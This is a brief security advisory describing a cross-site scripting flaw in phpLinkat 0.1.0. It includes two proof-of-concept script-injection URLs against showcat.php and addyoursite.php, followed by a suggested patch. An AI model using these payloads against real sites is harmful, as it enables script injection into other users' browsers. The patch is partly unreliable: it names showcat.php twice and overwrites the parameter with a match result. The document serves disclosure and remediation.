phpLinkat is a free Web-Based link indexing script written in PHP and
runs on MySQL.This product is server is vulnerable to the Cross-Site
Scripting vulnerability would allow attackers to inject HTML and script
codes into the pages and execute it on the clients browser as if it were
provided by the site.
+ Tested on:
- phpLinkat 0.1.0
+ Exploit:
- showcat.php?catid=<Script>JavaScript:alert('XSS Exploit');</Script>
- addyoursite.php?catid=<Script>JavaScript:alert('XSS
Exploit');</Script>
+ Solution:
- Open showcat.php
- Add this code to line 22:
$catid = HTMLSpecialChars($catid);
$catid = PREG_Match("/^[0-9]/", $catid);
If (!$catid){
Print "Error";
}Else{
- Add this code to line 138:
}} //end if
- Open showcat.php
- Add this code to line 14:
$catid = HTMLSpecialChars($catid);
$catid = PREG_Match("/^[0-9]/", $catid);
If (!$catid){
Print "Error";
}Else{
- Add this code to line 105:
}}
+ Links:
- Http://www.DesClub.com
